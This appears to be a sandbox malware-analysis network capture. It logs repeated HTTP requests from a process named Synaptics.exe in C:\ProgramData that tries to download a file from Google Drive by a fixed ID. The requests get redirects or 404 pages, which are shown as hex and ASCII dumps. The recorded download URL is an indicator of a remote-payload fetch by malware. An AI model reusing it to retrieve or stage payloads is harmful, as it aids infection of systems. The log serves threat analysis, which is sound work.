                                                                                                                                                                            2024-12-30 10:49:41 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:41 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 2d 6b 52 63 63 64 4d 30 69 39 57 54 64 47 31 5f 51 42 38 6e 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="E-kRccdM0i9WTdG1_QB8ng">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:41 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            108192.168.2.849878142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:41 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:41 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-MwTOY-0DznqvHwU86JOYeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            109192.168.2.849877142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:41 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:41 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5aGZvc6Q3HXDyiqjVeujOVzKCcM5jc-VHfg-lYVKvybX-DHLAQtvv5UErHpsUb9bCEsDrrwDo
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:41 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-U2wGyhEFfG5grkj82CXYbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:41 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:41 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 50 6d 61 68 46 2d 6d 30 33 72 6c 50 34 4e 31 71 39 4d 36 58 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="wPmahF-m03rlP4N1q9M6XQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:41 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            110192.168.2.849880142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:42 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:42 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-CL0OYuTms7AppzWznxvGWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            111192.168.2.849881142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:42 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:42 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-KdbRyFLKm-PoAtLT0_YMZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            112192.168.2.849882142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:42 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:43 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC4Up9kJdGl2f_6u8XE9-SjIQV7Oz-cOixI9wc8-mV9solDlqGx8m9ligb_VlbQR-vlJ
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:42 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-MLp9LyF43cM-joHmVzG5Dw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:43 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:43 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 5a 77 59 4d 72 30 35 66 5a 38 45 4c 38 51 44 31 57 61 66 33 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="dZwYMr05fZ8EL8QD1Waf3w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:43 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            113192.168.2.849884142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:42 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:43 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6VkEvHbZos701eT0OGTOWSVT8PbAfv4kMwHaqCFzimZpN2ef6sCO9TD4sCQ6pKz4CR
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:43 GMT
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-S_68dQhXVHsYkNKLLBBgXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:43 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:43 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 6a 6c 63 43 4a 6e 36 41 53 41 44 4c 6c 41 74 45 72 30 6f 6e 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="PjlcCJn6ASADLlAtEr0onA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
